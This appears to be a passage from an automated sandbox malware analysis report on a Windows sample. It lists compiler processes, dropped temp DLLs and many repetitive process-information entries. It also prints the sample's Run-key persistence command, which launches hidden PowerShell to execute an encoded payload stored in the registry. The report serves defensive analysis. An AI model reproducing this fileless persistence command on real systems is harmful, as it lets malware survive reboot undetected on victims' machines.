Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC82A0 pushfd ; ret 4_2_07FC82A2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC82A3 pushfd ; ret 4_2_07FC82AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC2281 push esi; ret 4_2_07FC2282
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC321B pushad ; ret 4_2_07FC3222
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC3059 pushad ; ret 4_2_07FC305A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC305B pushad ; ret 4_2_07FC3062
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC2FF8 pushad ; ret 4_2_07FC2FFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC2EE1 pushad ; ret 4_2_07FC2EE2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07FC1DA8 push esp; ret 4_2_07FC1DE2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08513B70 push eax; mov dword ptr [esp], edx 4_2_08513B74
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08513D51 push eax; mov dword ptr [esp], edx 4_2_08513D64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08513D60 push eax; mov dword ptr [esp], edx 4_2_08513D64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0851CE40 push eax; mov dword ptr [esp], edx 4_2_0851CE6C
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rf0jcwxf.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wxgbxjsa.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ginqqgem.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rf0jcwxf.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wxgbxjsa.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ginqqgem.cmdline

Persistence and Installation Behavior
barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ginqqgem.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\rf0jcwxf.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\wxgbxjsa.dll Jump to dropped file

Boot Survival
barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Maaneds3 Jump to behavior
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Maaneds3 c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $OBITUARY=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Billiond5;powershell.exe -windowstyle hidden -encodedcommand($OBITUARY) Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Maaneds3 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Maaneds3 Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
